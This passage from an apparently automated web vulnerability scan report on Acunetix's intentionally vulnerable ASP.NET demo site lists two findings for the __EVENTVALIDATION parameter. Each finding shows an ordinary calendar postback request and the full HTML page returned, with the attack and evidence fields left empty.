using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8347&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA6y0cwdoIZGRkAAou1c1gPNVw1VmOK4df7TXg8QA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtpO%2BnCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BzUvQdHc4LNB1H4w68tAK2IxW6C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:57 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA6y0cwdoIZGRkAAou1c1gPNVw1VmOK4df7TXg8QA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtpO+nCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+zUvQdHc4LNB1H4w68tAK2IxW6C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:White" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8248&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBABsdQc9oIZGRkPtt9p%2F%2BtjPDy%2F%2FqCdpacPfkXNIo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU3a3DBwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DOoigO68ylgbZpF0m73TCs0EmeCw%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:18 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBABsdQc9oIZGRkPtt9p/+tjPDy//qCdpacPfkXNIo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU3a3DBwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DOoigO68ylgbZpF0m73TCs0EmeCw=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:White" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is 